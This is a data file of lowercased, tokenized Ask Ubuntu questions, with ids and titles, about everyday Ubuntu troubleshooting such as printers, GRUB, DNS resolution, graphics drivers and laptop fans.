464638	ubuntu not detecting operating systems or partition	i am trying to install ubuntu . but it is showing error no operating systems detected . and when i click on something else it is not showing any of my partitions . when i click on gparted it is showing an error something like : /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does n't understand gpt partition tables . or perhaps you deleted the gpt table , and are now using an msdos partition table . is this a gpt partition table ? what do i do now ? how do i install ubuntu ? in one partition i have windows 8 & in one i have windows 7 . and bios is standard not uefi as windows 7 was factory shipped .
464640	is there a program that can put some kind of visual notification on my screen for use with the alarm clock app ?	i use the 'alarm-clock-applet ' to notify me every so often to take a break from looking at my screen and give my eyes a bit of a rest . the interface is clunky , but it works . one issue i 'm having , though , is that sometimes i do n't notice when it goes off . the indicator icon in the gnome panel ( i use flashback ) turns yellow , but it 's easy to miss . it can be set to play a sound , but i 'm often using my laptop in public settings where having an alarm go off at regular intervals would n't be acceptable . the program does offer me the option of running a command when the alarm goes off . it would be great if i could set something that maybe placed notice on my screen that i could n't ignore , or overlayed a transparent red over everthing , or something like that . i 'm open to ideas , the point just being that it should be something that there is no way i can ignore it . is there any command i can run that would create some kind of completely blatant visual notification ?
464644	which one is better to support multilingual environment on linux virtual terminal ?	i want to make multilingual console/terminal environment on ubuntu12.04 lts . in detail , i 'm going to input and display cjk ( chinese , japanese , korean ) on virtual console/terminal . after some of web surfing i found there were several solutions . fbterm + ucimf ucimf + ibus jfbterm which one is best of them in this case ?
464645	delete button does not work inside trash	i am using ubuntu 14.04 . delete button works fine from any folder and shifts the file to trash bin . shift+delete also works from everywhere ( including the trash ) . but the delete button does n't do anything inside the trash bin . should n't the delete button delete the file from the trash bin when used inside it ? is it by behaviour that delete button has no functionality inside the trash bin or just a bug that i am experiencing ?
464646	not pinging with host-name and ca n't ssh using hostname	i have setuped a dns server in centos6.5 and its working with every client machines other than ubuntu , now i have issue with ubuntu while im trying to ping from desktop machine to dns server as ping masterdns.arrivu.local i ca n't ping its return the as sysadmin @ localhost : ~ $ ping masterdns.arrivu.local ping : unknown host masterdns.arrivu.local but while i 'm pinging with the ip address its working sysadmin @ localhost : ~ $ ping 192.168.1.15 -c 3 ping 192.168.1.15 ( 192.168.1.15 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.1.15 : icmp_seq=1 ttl=64 time=0.450 ms 64 bytes from 192.168.1.15 : icmp_seq=2 ttl=64 time=0.445 ms 64 bytes from 192.168.1.15 : icmp_seq=3 ttl=64 time=0.265 ms -- - 192.168.1.15 ping statistics -- - 3 packets transmitted , 3 received , 0 % packet loss , time 1999ms rtt min/avg/max/mdev = 0.265/0.386/0.450/0.089 ms even i have checked using host its returning the ip sysadmin @ localhost : ~ $ host masterdns.arrivu.local masterdns.arrivu.local has address 192.168.1.15 my issue is i want to ping and ssh using hostname instead of ip as below ping masterdns.arrivu.local ssh root @ masterdns.arrivu.local im using desktop machine with ubuntu sysadmin @ localhost : ~ $ lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 14.04 lts release : 14.04 codename : trusty my desktop ip is 192.168.1.99 while i did a dig from my desktop i got the reply from dns sysadmin @ localhost : ~ $ dig masterdns.arrivu.local ; < < > > dig 9.9.5-3-ubuntu < < > > masterdns.arrivu.local ; ; global options : +cmd ; ; got answer : ; ; - > > header < < - opcode : query , status : noerror , id : 3101 ; ; flags : qr aa rd ra ; query : 1 , answer : 1 , authority : 2 , additional : 2 ; ; opt pseudosection : ; edns : version : 0 , flags : ; udp : 4096 ; ; question section : ; masterdns.arrivu.local . in a ; ; answer section : masterdns.arrivu.local . 86400 in a 192.168.1.15 ; ; authority section : arrivu.local . 86400 in ns secondarydns.arrivu.local . arrivu.local . 86400 in ns masterdns.arrivu.local . ; ; additional section : secondarydns.arrivu.local . 86400 in a 192.168.1.51 ; ; query time : 3 msec ; ; server : 192.168.1.15 # 53 ( 192.168.1.15 ) ; ; when : mon may 12 10:45:42 ist 2014 ; ; msg size rcvd : 124 nslookup too worked sysadmin @ localhost : ~ $ nslookup arrivu.local server : 192.168.1.15 address : 192.168.1.15 # 53 name : arrivu.local address : 192.168.1.15 name : arrivu.local address : 192.168.1.51 name : arrivu.local address : 192.168.1.155 name : arrivu.local address : 192.168.1.84 name : arrivu.local address : 192.168.1.99 name : arrivu.local address : 192.168.1.50 name : arrivu.local address : 192.168.1.145 my desktop interface info's sysadmin @ localhost : ~ $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto eth0 iface eth0 inet manual auto br0 iface br0 inet static address 192.168.1.99 network 192.168.1.0 netmask 255.255.255.0 broadcast 192.168.1.255 gateway 192.168.1.1 dns-nameservers 192.168.1.15 192.168.1.51 bridge_ports eth0 bridge_stp off bridge_fd 0 bridge_maxwait 0 sysadmin @ localhost : ~ $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 192.168.1.15 nameserver 192.168.1.51 search arrivu.local there is no iptables deployed in desktop machine 's or what i 'm using as dns server too [ root @ masterdns ~ ] # iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination dns forward entry [ root @ masterdns named ] # cat forward.arrivu $ ttl 86400 @ in soa masterdns.arrivu.local . root.arrivu.local . ( 2014051001 ; serial 3600 ; refresh 1800 ; retry 604800 ; expire 86400 ; minimum ttl ) @ in ns masterdns.arrivu.local . @ in ns secondarydns.arrivu.local . @ in a 192.168.1.15 @ in a 192.168.1.51 @ in a 192.168.1.155 @ in a 192.168.1.84 @ in a 192.168.1.99 @ in a 192.168.1.50 @ in a 192.168.1.145 masterdns in a 192.168.1.15 secondarydns in a 192.168.1.51 client in a 192.168.1.155 sukumar in a 192.168.1.84 babin in a 192.168.1.99 server in a 192.168.1.50 test in a 192.168.1.145 dns reverse entry [ root @ masterdns named ] # cat reverse.arrivu $ ttl 86400 @ in soa masterdns.arrivu.local . root.arrivu.local . ( 2014051001 ; serial 3600 ; refresh 1800 ; retry 604800 ; expire 86400 ; minimum ttl ) @ in ns masterdns.arrivu.local . @ in ns secondarydns.arrivu.local . @ in ptr arrivu.local . masterdns in a 192.168.1.15 secondarydns in a 192.168.1.51 client in a 192.168.1.155 sukumar in a 192.168.1.84 babin in a 192.168.1.99 server in a 192.168.1.50 test in a 192.168.1.145 15 in ptr masterdns.arrivu.local . 51 in ptr secondarydns.arrivu.local . 155 in ptr client.arrivu.local . 84 in ptr sukumar.arrivu.local . 99 in ptr babin.arrivu.local . 50 in ptr server.arrivu.local . 145 in ptr test.arrivu.local . guide me to get fix buddies
464651	problem with printing ( hplip ) in ubuntu 14.04	earlier when i run ubuntu 12.04 , it prompts to install printer on detecting by xterm ( it automatically download and configures hplip ) and my hp-laserjet working fine on ubuntu 12.04 . now , i am running ubuntu 14.04 ( installed form dvd ) . when i plugged printer , xterm does n't prompts so , i manually configured as following . 1 . open printer setting . it detects my hp laser jet p1007 2 . it auto configured correctly and ask to print test page 3 . but it not prints test-page . also not-printing anything and says job completed ! though it detected & configured properly but not printing . details from local-host : how to solve it ? give solution so that i can use my printer ( with ubuntu ) as soon as possible !
464653	ubuntu 14.04 not detecting samsungy android via usb cable	i had this same problem when previously using ubuntu 13.10 , among other issues with my windows dual boot . so i wiped the hard drive , re-installed ubuntu stand alone , and i still get the same dang error ! error message : **'unable to access “bcm21553 thunderbird”'** ! and **'unable to open mtp device ' [ usb:001,004 ] '** sorry , screenshot to upload since `` you need at least 10 reputation to post images ? ? ? '' i searched several forums previously and finally found a solution . however , when i rebooted later , the error still comes up and i do n't remember which solution worked originally . please help ! thanks , ~ loco also , i get several software updater failure errors ( do n't know if this coincides with this or other ubuntu problems ) mobile : samsung y gt-s5360 android 2.3.5 gingerbread laptop : samsung 64-bit amd e-450 apu with radeon hd graphics × 2
464656	ubuntu gnome 14.04 instal nvidia drivers	i have been looking all over the web , and tried every suggestion i found to get the nvidia drivers working on my computer with ubuntu gnome 14.04 , with no luck . every time i install a driver or choose to use the driver from addition drivers , when i reebot , i can not log in again . it gets stuck at the logo screen . i need to go to the alt + ctrl + f1 to purge all nvidia traces so i can get back . is it possible to install the new nvidia drivers ? i just upgraded from 13.10 to 14.04 , i have an asus n550vj which has hybrid graphics with intel 4000 / nvidia 750m what im looking for is to try the primus functionality to disable the discreet card and enable it whenever i want to play or run heavy graphic stuff . when i was in 13.10 i was using bumblebee , but , since , the nvidia prime is supposedly mature enough , i wanted to try it . is this possible for ubuntu gnome 14.04 . i read there was a bug with gdm , but also , saw that it was already fixed . thank you very much for your help . im not that well versed in linux .
464658	ati amd radeon hd 4350 graphics driver	i have card radeon ati hd 4350 and have problem with install drivers to this card . somebody know how do this ?
464659	are linux headers installed by default ? how to check if they 're installed ?	are linux headers installed by default ? how to check - via command line - if they 're installed ? ( in ubuntu and lubuntu 14.xx )
464660	unable to access âbcm21553 thunderbird and unable to open mtp device ' [ usb:001,004 ] ' when connecting samsungy android device	see same problem under previous post : ubuntu 14.04 not detecting samsungy android via usb cable any help would greatly appreciated ! ~ loco
464661	way to call through huawei modem in 14.04 e303	i have a huawei e303 u modem , i followed a guide from this link . everything is working except calling features . call goes to other end but no voice or vice versa . i mean , when somebody calls me , it shows on the dashboard . when i receive , no sound from either end . i mean , balance deducts , timer shows call duration on dashboard . but no sound from either receving or transmitting end . how to install mobile partner 21 for ubuntu
464663	how can i buy canonical ubuntu advantage licence for ubuntu os installed on one of cloud vm and how can i apply that licence	i have ubuntu os installed on one of the cloud vm , now i need to buy canonical ubuntu advantage license . so how can i buy it and apply it to ubuntu os on my cloud vm . will this license provide me any ubuntu bug support and upgrades .
464678	error untrusted packages ubuntu software	good morning : im new in ubuntu and i have a problem with he ubuntu software . i 've ubuntu 11.10 whats happens is that when i try to download a program from ubuntu software , the problem ( require installation of untrusted packages ) and take me the code i have to put in console , i put and some archives dont download and give me the url of the archive , and i put on internet and dont appear the archive . and this occurs with all programs of ubuntu . but my brother have the same pc with the same ubuntu and does not happen the same problem . i hope that you reply me for more questions email : carlosdiazsanz97 @ gmail.com
464682	create partition for boot drive	i have : ext4 454.6gb ( 409.7gb available ) in which i installed 12.04 ( precise ) 32-bit gnome 3.4.2 now i want to install windows 7 without formatting my current os . edit : check comments for images
464686	need help for gui version of llvm on ubuntu	i have ubuntu 12.04.2 running on my machine . currenly i have installed 'llvm-3.3 ' version to build code using 'clang ' compiler . iam able to compile and get the code analyzed output on command line . but now iam looking for a gui version for this llvm . is there any gui version of llvm compiler available ? or do we need to add a gui plug-in for the existing llvm version , if yes whats the gui plugin i can use ? can you please help on this regard . regards , raghu
464689	how to disable system tray notifications in 14.04 ?	i do n't like , need nor want the notification bubbles which pop up in the top right corner of the screen . i 've looked around quite a bit but ca n't identify how to disable them ? notifyosd configuration let 's me change the look of them , but not get rid of them . can anyone help ? thanks .
464690	how to start apache while it shows fail to stop apache	stopping apache ... fail . apachectl returned 1 . the status of the lampp is ok but the localhost is not opening , while stopping , it fails and the above error is shown.how to solve this problem ? what are the commands for that ?
464695	drivers for usb to vga external dual monitor	has the following been solved ? i have a lenovo ideacentre b300 all-in-one pc with ubuntu 14.04 . using this : usb to vga external dual or multi monitor adapter , that would then connect to a standard vga monitor , for e.g . like this : dell e2014h 19.5 '' led monitor , will ubuntu 14.04 have drivers for the same ? and will it work properly ? or do i have to do anything with xorg etc . ?
464701	find out what packages were installed after os install	how do i find out what packages have been installed since the os was installed ? i do not want to know all packages installed , only those that were not part of the initial os install , and have been explicitly installed afterwards . for the sake of this question , lets assume a fresh install , as i imagine distro upgrades would complicate matters . i would prefer to use command line , but a gui solution would be ok if a command or script is not available . i 've had a quick look at the man pages of dpkg and aptitude , but did n't see anything obvious . also , the output of apt-cache show package-name or dpkg -s pkg-name does n't seem to give any dates that can be compared against the date of os installation ( which i would have to work out how to get too ) . i have logwatch on a server that sends daily notifications of what has been installed . my guess is that it parses dpkg.log . i 'm not sure this method would be a solution , as many of the install entries may have been logrotated out , especially on older systems . and ideally this should work for any system , desktop or server . it would also be great if the output could include the version of the package currently installed , but that may be asking too much , and i can always script it later once i have the package names .
464702	how do i get a warning before my laptop powers off ?	in previous versions of ubuntu , when my laptop battery hit somewhere around 20 % power , the icon in the gnome panel ( i use flashback ) would turn red . also , there would be intermittent warnings telling me the computer was going to power off soon . however , since upgrading to 14.04 , i no longer get warnings , and , as far as i can tell , the computer is powering off a little early , like around 30 % . i've been caught off guard multiple times now . in the power settings dialog , there is an option for what to do when power is critically low , and i can change it to `` hibernate '' or `` power off '' . but there seems to be nothing about warnings or what determines `` critically low '' . how do i get ubuntu to give me fair warning before powering off ? and can i get it to have a little more patience instead of panicking and shutting down when i 've still got an hour left ?
464704	upgrade ubuntu 13.1 security update fail	ubuntu security kernel update 13.10 i 've been trying to install a kernel update for weeks , but i get the following message : das installieren oder entfernen eines software-pakets ist gescheitert . [ translation : the installation of a software package failed ] nothing else . trying it in a terminal results in the following error message : # apt-get upgrade use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : datei oder verzeichnis nicht gefunden [ translation : file or directory not found ] ( lese datenbank ... 343040 dateien und verzeichnisse sind derzeit installiert . ) [ translation : reading database ... 343040 files and directories are currently installed . ] vorbereitung zum ersetzen von linux-image-3.11.0-20-generic 3.11.0-20.34 ( durch ... /linux-image-3.11.0-20-generic_3.11.0-20.35_amd64.deb ) ... [ translation : preparing to replace linux-image-3.11.0-20-generic 3.11.0-20.34 ( with ... /linux-image-3.11.0-20-generic_3.11.0-20.35_amd64.deb ) ... ] use of uninitialized value in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 44 , < debconf_config > chunk 3 . use of uninitialized value in -e at /usr/share/perl5/debconf/dbdriver/file.pm line 46 , < debconf_config > chunk 3 . use of uninitialized value in pattern match ( m// ) at /usr/share/perl5/debconf/dbdriver/file.pm line 47 , < debconf_config > chunk 3 . use of uninitialized value $ directory in -d at /usr/share/perl5/debconf/dbdriver/file.pm line 48 , < debconf_config > chunk 3 . use of uninitialized value $ directory in concatenation ( . ) or string at /usr/share/perl5/debconf/dbdriver/file.pm line 49 , < debconf_config > chunk 3. debconf : dbdriver `` config '' : mkdir : datei oder verzeichnis nicht gefunden dpkg : fehler beim bearbeiten von /var/cache/apt/archives/linux-image-3.11.0-20-generic_3.11.0-20.35_amd64.deb ( -- unpack ) : [ translation : error when processing /var/cache/apt/archives/linux-image-3.11.0-20-generic_3.11.0-20.35_amd64.deb ( -- unpack ) : ] unterprozess neues pre-installation-skript gab den fehlerwert 1 zur端ck [ translation : the subprocess of a pre-install script returned error code 1 ] examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-20-generic /boot/vmlinuz-3.11.0-20-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-20-generic /boot/vmlinuz-3.11.0-20-generic fehler traten auf beim bearbeiten von : [ translation : errors occured while processing : ] /var/cache/apt/archives/linux-image-3.11.0-20-generic_3.11.0-20.35_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) what is wrong ?
464706	problem in changing the icons in ubuntu 12.04	while entering the password on welcome screen , i noticed the icons were more beautifully placed . i tried to change the icons and theme of the desktop through ubuntu tweak to that of the welcome screen . but i could not find a way . also , i want to change the look of the menu bar to that on the welcome screen . please help .
464709	how to get gnome shell to remember my display preferences ?	i have a laptop . when i 'm using just the laptop , i want to use the display ( well , yeah , obviously ) but when i plug in my monitor , i want to just use that monitor , not both screens . every time i boot up i have to go to displays , turn off the laptop 's , confirm that yes , the display is what i want to keep , close the displays config . it works , but it hardly adds to productivity . i 'm using gnome shell under 14.04 lts `` ubuntu gnome '' . i was previously using 12.04 lts stock ubuntu + gnome shell , and the previous config seemed more intelligent in this regard . i note that the stock ubuntu + gnome shell used lightdm and the gnome remix uses gdm . i suspect that 's a fix - do n't use gdm - but it seems a shame because lightdm will load up a whole load of libs that i do n't need/want , according to dependencies .
464710	come back to my pervios point in pdf	suppose you reading a pdf with document viewer now you want to search a word in pdf you press ctrl + f search your word.the list appear you click on one of them see the passage . so now you want to come back and countinue reading pervios part . is there any way in document viewer ? if not do you know a pdf reader from repository to do that ?
464711	how to make unity not merge vmware icons ?	i have windows 7 running in a vmware player in unity mode under ubuntu ( for outlook ) . even though there are vastly different programs running in windows , they are grouped together in a single icon by ubuntu . i would like to have unity ( the ubuntu one ) not do that , but show an icon for each instead . how would i do that ?
464714	wacom intuos stopped working	i followed http : //matthewwittering.com/blog/ubuntu-tips/how-to-install-a-wacom-intuos-ctl-480-tablet-on-ubuntu.html to set up my intuos ( cth-680 ) to work with ubuntu 13.10 desktop . it worked . then i noticed i need to repeat the last steps of that procedure after every reboot or 'suspend ' . otherwise it would not work - the modules would still be where they should be , but the tablet does n't control the mouse any more , only gets its power from the computer , but has no effect . repeating the last steps of the procedure fixed that . later on , i noticed that even after repeating the depmod modprobe and insmod commands as specified in the aforementioned procedure , it does n't work , and i rather have to repeat most of the mentioned procedure once in a while for it to work . so i 'm not sure if the need to repeat the procedure arises due to reboots , suspends , ubuntu updates , or anything else . it would be nice not having to repeat the procedure so any advice other than creating a script to run the procedure would be nice and informing .
464716	import certificate in pdgin for microsoft lync 2013	i follow this issue to configure pidgin for ms lync 2013 . i get this message : web ticket request to https : //rproxy.mycompany.com:443/certprov/certprovisioningservice.svc failed known that settings has been configured as following : and no proxy : i received this certificate from ms sysadmin . and i do n't know if it is useful in ubuntu . if so , how can i import it ? and why rproxy appeared in message error even there is no proxy in my settings . i mean : https : //rproxy.mycompany.com:443/certprov/certprovisioningservice.svc update : i found where can i import certificate : however , i get new error message : ssl connection failed known that authentication scheme is : kerberos , not tls-dsk
464717	how to add a final form feed to a ppd-file ( because deskjet 710c does not eject last page )	recently , i stepped over from xp to xubuntu 12 . during install everything seemed fine and my hp deskjet 710c was recognized ( usb configuration ) . however the printer does not eject the last page . the only thing that works right now is a tespage only using black and white cartridge . i realize that this story similar to another on this forum called hp deskjet 720 c usb printer does n't finish which is closed . however , i have also found that the solution for another problem like this ( other printer ) consisted of adding a `` final form feed '' to the ppd file . therefore i would like to try the same here . my question is therefore : how can i add a `` final form feed '' to a ppd file ? any help is highly appreciated . many thanks in advance . kind regards . victor .
464719	ubuntu server with raspberry pi motion camera	i have an ubuntu server that i use as a web server . everything works great , i have multiple sites set up . my router allows only one device to own the public ip which is my ubuntu server . i set up a raspberrypi with a camera and motion . again , everything works great - i can access the cam via a browser ( ip:8081 ) . i want to run a website from my ubuntu and display a live stream from the raspberry . this works great with < img src= '' ip:8081 ? action=stream / > . however , since the raspberry is internal ip only , i ca n't see the stream when i 'm outside my network . what do i need to do to have my ubuntu accessing the raspberry and feedback the stream ? the app is based on codeigniter by the way , motion is set up to work outside locahost as well .
464722	canon-lbp2900 printer not working on ubuntu 14.04	i could not get cannon lbp printer to work on ubuntu ( 14.04 ) after trying everything possible on the internet . packages intsalled - cndrvcups-capt_2.60-1_i386.deb and cndrvcups-common_2.60-1_i386.deb the printer adds job the queue and fails to print silently . here is the cups error log - ipt @ ipt-g41d3c : ~ $ tail -f /var/log/cups/error_log e [ 12/may/2014:11:33:22 +0000 ] [ client 19 ] returning ipp client-error-document-format-not-supported for print-job ( ipp : //localhost/printers/generic-text-only ) from localhost e [ 12/may/2014:12:01:30 +0000 ] **canon-lbp2900** : file `` /usr/lib/cups/filter/pstocapt '' not available : no such file or directory e [ 12/may/2014:12:01:30 +0000 ] canon-lbp2900 : file `` /usr/lib/cups/filter/pstocapt '' not available : no such file or directory e [ 12/may/2014:12:01:30 +0000 ] canon-lbp2900 : file `` /usr/lib/cups/filter/pstocapt '' not available : no such file or directory e [ 12/may/2014:13:59:53 +0000 ] [ job 13 ] unable to send data to printer . e [ 12/may/2014:14:04:53 +0000 ] [ job 13 ] stopping unresponsive job . e [ 12/may/2014:14:06:37 +0000 ] [ job 14 ] unable to send data to printer . as you can see in the snapshot printer is not able to process the print jobs .
464723	ubuntu 14.04 on virtualbox in windows 7 runs at 100 % cpu and very slowly	i know it 's been asked why ubuntu is slow as a guest os in virtualbox , but all those answers are fairly old and seem to focus on graphics . in my case booting is also very slow , and there is a long delay when launching the software center ( or anything ) during which time the cpu runs at 100 % but nothing is happening graphically . i 've given the guest 2 gb of ram , 16 gb of disk space , enabled 3d acceleration ( does n't seem to make a different either way , though ) , gave it 1 cpu ( i was n't allowed to select more ) . shutdown is also slow .
464728	how to disable gnu grub boot menu and set windows boot menu as default ?	i recently installed ubuntu 14.04 and everytime i switch on my computer , it boots to gnu grub menu . now my question is , how do i disable gnu grub menu and set windows boot menu as default ? gnu grub menu ( which i want to disable ) : default windows boot menu ( which i need ) :
464731	12.04 to 14.04 update slows down the system	i recently updated from 12.04 to 14.04 lts . but the system is very slow . everything works , but slowly . what could be the reason ? . i have 4gb ram , 10gb swap space and 300 gb of hard disk . also the graphics card used by me is 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880 [ radeon hd 4250 ]
464733	help ? grub rescue ?	i was using my computer last night and today , when i started it up , a screen appeared saying grub rescue unknown file system . i tried to find the right partition and follow the steps on unknown filesystem , grub rescue and found out that the right partition to boot my device on is ( hd0 , msdos6 ) , since when i entered grub rescue > ls ( hd0 , msdos6 ) / , loads of stuff like lost+found/ etc/ media/ and more came out . then , i typed in setprefix= ( hd0 , msdos6 ) /boot/grub , following with setroot= ( hd0 , msdos6 ) and the next step should be ins do normal , however , i got a message saying error : unknown file system . and when i typed in the command normal , it says unknown command : normal . what should i do ? i need my computer for school work as i have an assignment to hand in this morning . ( if you are just wondering how i am using the internet , i am using my phone . please help , urgent . thanks . ps : i am not really an expert when it comes to ubuntu , so please explain a little bit clearer . thx : )
464735	epson c1700 printer probelm	is there anybody who has the same issue with an epson c1700 printer ? i found no drivers for linux ( ubuntu 14.04 lts ) i tried xerox , minolta but does n't work ! please help me to get work the printer . note : answer only if you have tested or solved the issue by your own and not heard from somebody who had heard from another that something will work . i found a lot of useless stuff on the internet ! i ca n't believe that i 'm the only linux user with an epson c1700 printer . thanks , harry
464738	disable 'grave ' button in ubuntu 14.04	i want to bind in `` guake terminal '' grave ` button to some action , but ca n't do this , always get exception that `` can not bind global grave button '' . also i disabled alt+` for `` switches windows of current application '' in unity , and now this shortcut works in `` guake '' , but just ` does n't work still . maybe some suggestion or some ideas how to check what application uses this hot-key and deny it , to have ability to use in `` guake '' . thanks . information about grave button
464740	how to change pgadmin3 theme	currently i 'm using ambiance-dark theme , pgadmin look very bad when using this theme ( and maybe other dark theme ) . how to change pgadmin3 theme ?
464741	how to install lxqt de in ubuntu 14.04 lts ?	i heard like there is a new ( lightweight ) desktop environment available named as lxqt for ubuntu and i would like to know how can i install it in my ubuntu 14.04 . thank you .
464743	error when installing python-guestfs on ubuntu 12.04	i am trying to set up openstack on 3 vms using vmware . i am at the part of configuring a compute node and the first step is to install nova-compute-kvm and python-guestfs . after i issue the apt-get install command for the 2 a window appears and it says `` configuring libguestfs0 '' and an ok button is there but i ca n't preset . so i am stuck at this part ... can you help me please ? i am following this guide from the beggining : http : //docs.openstack.org/icehouse/install-guide/install/apt/content/nova-compute.html update : ok so after trying 2 times and getting the same thing i restarted my vm and when i ran apt-get install again i got the message that the 2 are already installed so i guess problem solved ! ?
464744	laptop touchpad not working	i recently installed ubuntu 13.4 on my old lenovo3000y500.first the all things was going right.when i reboot my laptop the problem arise after the reboot the laptop wo n't detect the touchpad.i am not able to scroll and the left and right click button are also not working so guys please help me to recover from this problem
464745	loud fan on ubuntu 14.04	i have a dell latitude e5420 laptop which i upgraded from ubuntu 13.10 to ubuntu 14.04 a few days ago . i ca n't help noticing a new annoying behaviour of the fan : it repeatedly gets loud every 1-2 seconds , it turns off , and then on again , for minutes and without any intensive-cpu process running . is there any fix for this ? ok , so the temperature does seem to increase a little bit during these loud moments . it goes quickly from 50 to 60 degrees celsius , and then it cools off and goes back to 50 . it just had never happened so often before ... noisy : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +25.0°c ( crit = +107.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +55.0°c ( high = +80.0°c , crit = +85.0°c ) core 0 : +55.0°c ( high = +80.0°c , crit = +85.0°c ) core 1 : +54.0°c ( high = +80.0°c , crit = +85.0°c ) i8k-virtual-0 adapter : virtual device right fan : 121350 rpm cpu : +59.0°c quiet : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +25.0°c ( crit = +107.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +49.0°c ( high = +80.0°c , crit = +85.0°c ) core 0 : +51.0°c ( high = +80.0°c , crit = +85.0°c ) core 1 : +51.0°c ( high = +80.0°c , crit = +85.0°c ) i8k-virtual-0 adapter : virtual device right fan : 0 rpm cpu : +50.0°c this user , with a similar notebook model ( dell latitude e6400 ) , is having the exact same issue . edit 2 . now the fan has been turning itself on and off for minutes , but the temperature is stable at 42 degrees celsius : $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +25.0°c ( crit = +107.0°c ) coretemp-isa-0000 adapter : isa adapter physical id 0 : +41.0°c ( high = +80.0°c , crit = +85.0°c ) core 0 : +40.0°c ( high = +80.0°c , crit = +85.0°c ) core 1 : +40.0°c ( high = +80.0°c , crit = +85.0°c ) i8k-virtual-0 adapter : virtual device right fan : 102210 rpm cpu : +42.0°c edit 3 . i updated the dell bios to the latest version ( from 5 to 14 ) , but to no avail . if i run the fan test with fwts , one test fails and 5 succeed . i ca n't get a more verbose output , though ... $ fwts fan running 1 tests , results appended to results.log test : simple fan tests . test fan status . 5 passed , 1 failed load system , check cpu fan status .
464746	install canon lbp 2900b printer on my clients system	i have recently installed ubuntu on my system to start learning linux . my boss has challenged me to install canon lbp 2900b on my computer . i have googled many pages but none of them are working fine for me . many of the commands are giving me some dependency errors . i 'm not much versed with programming knowledge , please can anyone help me with simple instructions and tutorial .
464747	channel bonding modes	i wanted to know where is the documentation of channel bonding implementation in ubuntu because the bonding modes are described differently on the internet i have ubuntu server 10.0.4 lts and it 's using 2.6 kernel thank you
464749	i am using texmaker to write mycv so i got error for cvcolor	! latex error : file `moderncvcolorblue.sty ' not found . \documentclass [ 11pt , a4paper ] { moderncv } % moderncv themes \moderncvtheme [ blue ] { classic } % optional argument are 'blue ' ( default ) , 'orange ' , 'green ' , 'red ' , 'purple ' , 'grey ' and 'roman ' ( for roman fonts , instead of sans serif fonts ) % \moderncvtheme [ green ] { classic } % idem % character encoding \usepackage [ utf8 ] { inputenc } % replace by the encoding you are using % adjust the page margins \usepackage [ scale=0.7 ] { geometry } % \setlength { \hintscolumnwidth } { 3cm } % if you want to change the width of the column with the dates % \atbegindocument { \setlength { \maketitlenamewidth } { 6cm } } % only for the classic theme , if you want to change the width of your name placeholder ( to leave more space for your address details % \atbegindocument { \recomputelengths } % required when changes are made to page layout lengths
464750	how to decrypt a luks partition ?	i checked the luks encryption while installing ubuntu 14.4. now i cant access windows partition . how can i decrypt that ? i tried cryptsetup luksremovekey it just removed the key itself . is it even possible to restore it ?
464751	accidentally moved the home directory to another folder	i was trying to move a folder `` foxit reader '' which was located in /opt to the home directory . i searched on how to do that and they told me to do this : sudo su cd /opt mv -t foxit\ reader/ /home but apparently what it did was moving all the home to inside the foxit reader folder . and now i ca n't open anything , how can i fix this ?
464753	tiff image colors looks different when viewed on ubuntu	i recently developed a raw image with lightroom ( on windows ) and exported it as a tiff image . when i view that image on ubuntu 13.10 ( same computer , same monitor ) the colors look different from how i see them on windows ( less vivid perhaps ) . i guess it has something to do with color management or preview rendering ( assuming tiffs behave like raws ) , but the colors look off also after i open the image . can someone clarify this behaviour ? from the software center i see i have libtiff-tools , libtiff5 and gnome-raw-thumbnailer installed . my monitor is not color managed ( not that i know ) .
464755	how to install openjdk 8 on 14.04 ?	important : if you need this in 14.04 , vote for this bug : https : //bugs.launchpad.net/ubuntu/+source/openjdk-8/+bug/1341628 java 8 is now available according to http : //openjdk.java.net/projects/jdk8/ , but http : //openjdk.java.net/install/ does not yet mention how to install openjdk 8 ( not oracle java ) on ubuntu . how and when can this be done ? ( for now we will use oracle java - the optimal solution for me is , however , openjdk from the ubuntu repositories , until oracle java is available directly and effortless from the ubuntu repositories )
